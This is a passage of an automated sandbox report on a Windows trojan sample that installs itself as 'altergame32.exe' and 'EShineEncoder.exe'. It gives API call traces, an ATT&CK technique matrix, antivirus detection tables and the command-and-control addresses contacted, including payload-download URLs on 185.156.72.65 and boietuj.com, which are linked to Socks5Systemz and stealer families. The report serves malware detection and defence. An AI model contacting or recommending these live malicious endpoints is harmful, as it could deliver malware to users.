            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,6_2_6096A5EE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,6_2_6094B54C
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60925686
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,6_2_6094A6C5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,6_2_609256E5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B6ED
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092562A sqlite3_bind_blob,6_2_6092562A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,6_2_60925655
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6094C64A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_609687A7
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6095F7F7
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,6_2_6092570B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F772
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,6_2_60925778
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090577D sqlite3_bind_parameter_name,6_2_6090577D
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B764
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090576B sqlite3_bind_parameter_count,6_2_6090576B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,6_2_6094A894
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F883
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,6_2_6094C8C2
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,6_2_6096281E
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,6_2_6096583A
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,6_2_6095F9AD
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6094A92B
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6090EAE5 sqlite3_transfer_bindings,6_2_6090EAE5
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,6_2_6095FB98
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_6095ECA6
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095FCCE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6095FDAE
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,6_2_60966DF1
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_60969D75
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,6_2_6095FFB2
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
            | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 2 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | 1 Bootkit | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Windows Service | 21 Software Packing | NTDS | 45 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 1 Timestomp | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | 122 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 3 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 212 Process Injection | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
            [Behavior Graph ID: 1559044, Sample: file.exe, Startdate: 20/11/2024, Architecture: WINDOWS, Score: 100]

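            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | file.exe | 37% | ReversingLabs | | |
            | file.exe | 40% | Virustotal | | Browse |
            | file.exe | 100% | Avira | HEUR/AGEN.1306956 | |
            | file.exe | 100% | Joe Sandbox ML | | |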
            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file | 100% | Avira | PUA/Agent.EI | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe | 100% | Joe Sandbox ML | | |
            | C:\ProgramData\EShineEncoder\EShineEncoder.exe | 100% | Joe Sandbox ML | | |
            | C:\ProgramData\EShineEncoder\sqlite3.dll | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\LTDIS13n.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\bjpeg23.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\gdiplus.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-28G11.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-GSS65.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-HKUEM.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-NKP4B.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-PR9GR.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-QDBOH.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\is-T3HEM.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\ltkrn13n.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\msvcp71.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\msvcr71.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\AlterGame 1.13\sqlite3.dll (copy) | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file | 54% | ReversingLabs | Win32.Trojan.PLoader | |
            | C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | | |
            | C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | 3% | ReversingLabs | | |
            | C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe | 54% | ReversingLabs | Win32.Trojan.PLoader | |
            No Antivirus matches
            No Antivirus matches
            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | http://185.208.158.202/s | 0% | Avira URL Cloud | safe | |
            | http://185.208.158.202/search/?q~w | 0% | Avira URL Cloud | safe | |
            | boietuj.com | 0% | Avira URL Cloud | safe | |
            | http://www.freecommander.com/fchelpxe/de/FreeCommander.html | 0% | Avira URL Cloud | safe | |
            | http://freecommander.com/chm/FreeCommanderXE_chm_en.zip | 0% | Avira URL Cloud | safe | |
            | http://freecommander.com/chm/FreeCommanderXE_chm_de.zip | 0% | Avira URL Cloud | safe | |
            | http://freecommander.com/en/downloads/ | 0% | Avira URL Cloud | safe | |
            | http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosub | 100% | Avira URL Cloud | malware | |
            | http://185.208.158.202/s | 2% | Virustotal | | Browse |
            | http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 | 0% | Avira URL Cloud | safe | |
            | http://185.156.72.65/dll/download | 0% | Avira URL Cloud | safe | |
            | http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958 | 0% | Avira URL Cloud | safe | |
            | http://185.156.72.65/dll/key | 0% | Avira URL Cloud | safe | |
            | http://www.freecommander.com/fchelpxe/en/FreeCommander.html | 0% | Avira URL Cloud | safe | |
            | http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a | 0% | Avira URL Cloud | safe | |
            | https://www.easycutstudio.com/support.html | 0% | Avira URL Cloud | safe | |
            | http://185.156.72.65/files/download | 100% | Avira URL Cloud | malware | |
            | http://www.forum.freecommander.com/viewtopic.php?f=6&t=775 | 0% | Avira URL Cloud | safe | |
            | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
            | --- | --- | --- | --- | --- | --- |
            | boietuj.com | 185.208.158.202 | true | true | | unknown |
              | Name | Malicious | Antivirus Detection | Reputation |
              | --- | --- | --- | --- |
              | boietuj.com | true | Avira URL Cloud: safe | unknown |
              | http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosub | true | Avira URL Cloud: malware | unknown |
              | http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31df92d8838ed12a666d307eca743ec4c2b07b529669238658ef814c4ef90 | true | Avira URL Cloud: safe | unknown |
              | http://185.156.72.65/dll/download | true | Avira URL Cloud: safe | unknown |
              | http://185.156.72.65/dll/key | true | Avira URL Cloud: safe | unknown |
              | http://boietuj.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a | true | Avira URL Cloud: safe | unknown |
              | http://185.156.72.65/files/download | true | Avira URL Cloud: malware | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.208.158.202/s | altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.innosetup.com/ | NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr | false | | high
http://www.freecommander.com/fchelpxe/de/FreeCommander.html | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr | false | | high
http://freecommander.com/chm/FreeCommanderXE_chm_en.zip | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://185.208.158.202/search/?q~w | altergame32.exe, 00000006.00000002.3049178628.0000000003756000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://freecommander.com/chm/FreeCommanderXE_chm_de.zip | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://freecommander.com/en/downloads/ | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
https://code.google.com/p/ddab-lib/issues/list | altergame32.exe, 00000006.00000000.1928604067.00000000004CB000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | | high
http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958 | altergame32.exe, 00000006.00000002.3047839093.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049094019.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3047839093.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.freecommander.com/fchelpxe/en/FreeCommander.html | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | NqISs1vOr.exe, 00000002.00000003.1902294048.0000000002188000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1902059776.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, NqISs1vOr.tmp, 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-CUGJK.tmp.3.dr, NqISs1vOr.tmp.2.dr | false | | high
https://www.easycutstudio.com/support.html | NqISs1vOr.exe, 00000002.00000003.1901672648.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000003.1901741426.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.exe, 00000002.00000002.3047882008.0000000002181000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904023339.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3047892256.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000003.1904097648.0000000002228000.00000004.00001000.00020000.00000000.sdmp, NqISs1vOr.tmp, 00000003.00000002.3048327976.0000000002228000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.208.158.202/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d | altergame32.exe, 00000006.00000002.3047839093.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.forum.freecommander.com/viewtopic.php?f=6&t=775 | altergame32.exe, 00000006.00000000.1928604067.000000000052B000.00000002.00000001.01000000.0000000A.sdmp, altergame32.exe.3.dr, EShineEncoder.exe.6.dr, is-85EG4.tmp.3.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.156.72.65 | unknown | Russian Federation | | 44636 | ITDELUXE-ASRU | true
185.208.158.202 | boietuj.com | Switzerland | | 34888 | SIMPLECARRER2IT | true
89.105.201.183 | unknown | Netherlands | | 24875 | NOVOSERVE-ASNL | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1559044
                        Start date and time:2024-11-20 05:01:07 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@16/40@1/3
                        EGA Information:
                        • Successful, ratio: 80%
                        HCA Information:
                        • Successful, ratio: 92%
                        • Number of executed functions: 202
                        • Number of non-executed functions: 264
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:02:59 | API Interceptor | 115x Sleep call for process: altergame32.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.156.72.65 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT | Browse | 185.156.72.65/toload/mixtwo.exe
185.208.158.202 | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
 | file.exe | Get hash | malicious | Socks5Systemz | Browse |
 | gxjIKuKnu7.exe | Get hash | malicious | Socks5Systemz | Browse |
 | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse |
 | BJqvg1iEdr.exe | Get hash | malicious | Socks5Systemz | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar | Browse |
 | G4G14X6zxY.exe | Get hash | malicious | Socks5Systemz | Browse |
89.105.201.183 | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse | 404
 | N6jsQ3XNNX.exe | Get hash | malicious | Socks5Systemz | Browse | 200
 | cv viewer plugin 8.31.40.exe | Get hash | malicious | Socks5Systemz | Browse | 200
                                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SIMPLECARRER2IT | http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.com | Get hash | malicious | HTMLPhisher | Browse | 185.208.158.251
 | 0a0#U00a0.js | Get hash | malicious | RHADAMANTHYS | Browse | 185.196.8.68
 | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 185.208.158.202
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
 | http://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.com | Get hash | malicious | HTMLPhisher | Browse | 185.196.8.148
 | gxjIKuKnu7.exe | Get hash | malicious | Socks5Systemz | Browse | 185.208.158.202
 | https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com | Get hash | malicious | HTMLPhisher | Browse | 185.208.158.9
NOVOSERVE-ASNL | i7j22nof2Q.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 89.105.201.183
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | file.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | gxjIKuKnu7.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | OFjT8HmzFJ.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | BJqvg1iEdr.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar | Browse | 89.105.201.183
 | G4G14X6zxY.exe | Get hash | malicious | Socks5Systemz | Browse | 89.105.201.183
ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT | Browse | 185.156.72.65
